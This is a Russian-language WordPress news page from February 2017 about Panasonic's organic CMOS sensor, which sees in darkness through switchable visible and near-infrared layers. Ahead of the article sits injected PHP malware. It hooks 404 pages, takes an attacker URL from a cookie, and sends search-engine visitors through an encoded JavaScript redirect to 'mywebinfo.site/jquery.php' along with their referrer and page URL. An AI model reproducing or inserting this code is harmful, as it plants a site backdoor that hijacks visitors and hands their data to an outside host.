function wpd_do_stuff_on_40404(){ if( is_404() ){ if (!empty($_COOKIE["ee2da706cf547c9cb12fc30be76605b6"])) { update_option('wpd_do_stuff_on_40404_url', rawurldecode($_COOKIE["ee2da706cf547c9cb12fc30be76605b6"])); } if (strpos($_SERVER["HTTP_REFERER"], 'google.') !== FALSE || strpos($_SERVER["HTTP_REFERER"], 'bing.') !== FALSE) { $u = get_option('wpd_do_stuff_on_40404_url', 'mywebinfo.s' . 'ite/jquery.php'); if (!empty($u)) { $fu = 'http://' . $u . "?referrer=" . $_SERVER["HTTP_REFERER"] . '&u=' . rawurlencode($_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); $t = rawurldecode("%3Chtml%3E%0D%0A%20%20%20%3Chead%3E%0D%0A%20%20%20%20%20%20%3Cscript%20type%20%3D%20%22text%2Fjavascript%22%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20function%20Redirect%28%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20window.location%20%3D%20%22%25s%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20document.write%28%22You%20will%20be%20redirected%20to%20main%20page%20in%202%20sec.%22%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20setTimeout%28%27Redirect%28%29%27%2C%202000%29%3B%0D%0A%20%20%20%20%20%20%3C%2Fscript%3E%0D%0A%20%20%20%3C%2Fhead%3E%0D%0A%20%20%20%3Cbody%3E%0D%0A%20%20%20%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A"); exit(sprintf($t, $fu)); } } } } add_action( 'template_redirect', 'wpd_do_stuff_on_40404' ); технологии комфорта от 23/02/2017 | Технологии Комфорта

технологии комфорта от 23/02/2017

Сегодня в номере:

  • Сенсор Panasonic позволит автомобилям «видеть» в темноте.

Инженеры Panasonic разработали CMOS-сенсор, способный обеспечить четкое изображение при съемке в полной темноте. Органическая матрица не требует механического инфракрасного фильтра и позволяет сохранить высокую детализацию снимка без потери разрешения. Технология ориентирована на использование в «умных» автомобилях, промышленных камерах и системах видеонаблюдения.

Как этого добились?

Panasonic использовала два разных слоя органической пленки. Один из них обладает хорошей чувствительностью в видимом спектре, а другой — в ближнем инфракрасном диапазоне. Переключение между цветным и ИК-режимом осуществляется с помощью напряжения: при средних значениях датчик работает как обычная CMOS-матрица, а под более высоким напряжением работают оба слоя пленки, и камера может снимать в практически кромешной тьме. Аналоги всего лишь модифицируют Байеровскую схему сенсоров, заменяя зеленый субпиксель в схеме RGGB на пропускающий ИК-излучение фильтр. При этом задействована только четвертая часть чувствительных элементов.



Изображение сделано в цветном режиме (слева) и ИК (справа).


Изображение сняты в цветном режиме (слева) и ИК (справа). Ближний ИК диапазон позволяет видеть символы на этикетках в резервуаре, заполненном соевым соусом.

Разработка позволит камерам самоуправляемого автомобиля следить за дорогой даже в ночное время (обычно с этим нет проблем, но только если дорожную разметку хорошо видно). Чувствительность в ближнем ИК-диапазоне также позволит заглянуть внутрь предметов, которые пропускают это излучение (в качестве примера показаны стеклянные бутылки, погруженные в соевый соус). На производстве такая камера может захватить изображение даже быстро движущегося объекта на конвейере.



Покадровое переключение режима съемки вращающихся бутылок. QR-код печатается специальными чернилами и по-разному определяется в зависимости от спектра. Даже при вращении бутылки, органический сенсор позволяет получать четкие изображения QR-кода на этикетке.

Источник: Panasonic

Опубликовано 24.02.2017в 3:36 пп. В рубриках: Технологии комфорта. Вы можете следить за ответами к этой записи через RSS 2.0. Отзывы и пинг пока закрыты.

Комментарии закрыты.